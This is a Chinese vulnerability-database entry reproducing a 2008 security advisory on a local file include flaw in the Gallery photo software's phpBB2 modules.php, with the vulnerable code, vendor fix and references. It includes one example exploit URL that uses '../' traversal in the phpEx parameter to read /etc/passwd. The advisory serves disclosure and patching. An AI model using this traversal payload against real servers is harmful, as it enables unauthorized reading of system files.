Gallery modules.php 文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1185882 漏洞类型 路径遍历
发布时间 2008-08-12 更新时间 2008-08-12
CVE编号 CVE-2008-3600 CNNVD-ID CNNVD-200808-149
漏洞平台 N/A CVSS评分 6.8
|漏洞来源
https://www.securityfocus.com/bid/84870
https://cxsecurity.com/issue/WLB-2008080142
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200808-149
|漏洞详情
Gallery是一套基于Web的图片管理软件。Gallery1.5.7版本和1.6-alpha3版本中的contrib/phpBB2/modules.php存在目录遍历漏洞。当register_globals被启用时,远程攻击者可以借助modload操作范围内的phpEx参数中的"..",放入和运行任意的本地文件。
|漏洞EXP

Digital Security Research Group [DSecRG] Advisory       #DSECRG-08-035

Application:                    Gallery 
Versions Affected:              1.5.7, 1.6-alpha3
Vendor URL:                     http://gallery.menalto.com/
Bug:                            Local File Include
Exploits:                       YES
Reported:                       14.07.2008
Vendor response:                15.07.2008
Solution:                       YES
Date of Public Advisory:        08.08.2008
Authors:                        Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)

Description
***********

Gallery system has local file include vulnerability in script contrib/phpBB2/modules.php

Successful exploitation requires that "register_globals" is enabled.

Code
****
#################################################

switch ($_REQUEST['op']) {
    case 'modload':
        // Added with changes in Security for PhpBB2.
        define('IN_PHPBB', true);

define ("LOADED_AS_MODULE","1");
        $phpbb_root_path = "./";
        // connect to phpbb
        include_once($phpbb_root_path . 'extension.inc');
        include_once($phpbb_root_path . 'common.'.$phpEx);
        include_once($phpbb_root_path . 'includes/functions.'.$phpEx);

#################################################

Example:

http://[server]/[installdir]/contrib/phpBB2/modules.php?op=modload&phpEx
=../../../../../../../../../../../../../etc/passwd

Solution
********

Vendor fix this flaw on 05.08.2008. Download Gallery 1.5.8 and 1.6-RC1 from download page on SourceForge:

http://sourceforge.net/project/showfiles.php?group_id=7130&package_id=72
39&abmode=1

More information about release: http://gallery.menalto.com/gallery_1.5.8_released

About
*****

Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website.

Contact:    research [at] dsec [dot] ru
            http://www.dsec.ru (in Russian)
|受影响的产品
Menalto Gallery 1.6 Alpha3 Menalto Gallery 1.5.7
|参考资料

来源:XF
名称:gallery-modules-file-include(44373)
链接:http://xforce.iss.net/xforce/xfdb/44373
来源:BUGTRAQ
名称:20080808[DSECRG-08-035]LocalFileIncludeVulnerabilityinGallery1.5.7,1.6-alpha3
链接:http://www.securityfocus.com/archive/1/archive/1/495284/100/0/threaded
来源:MILW0RM
名称:6222
链接:http://www.milw0rm.com/exploits/6222
来源:SREASON
名称:4142
链接:http://securityreason.com/securityalert/4142
来源:GENTOO
名称:GLSA-200811-02
链接:http://security.gentoo.org/glsa/glsa-200811-02.xml
来源:SECUNIA
名称:32662
链接:http://secunia.com/advisories/32662
来源:gallery.menalto.com
链接:http://gallery.menalto.com/gallery_1.5.8_released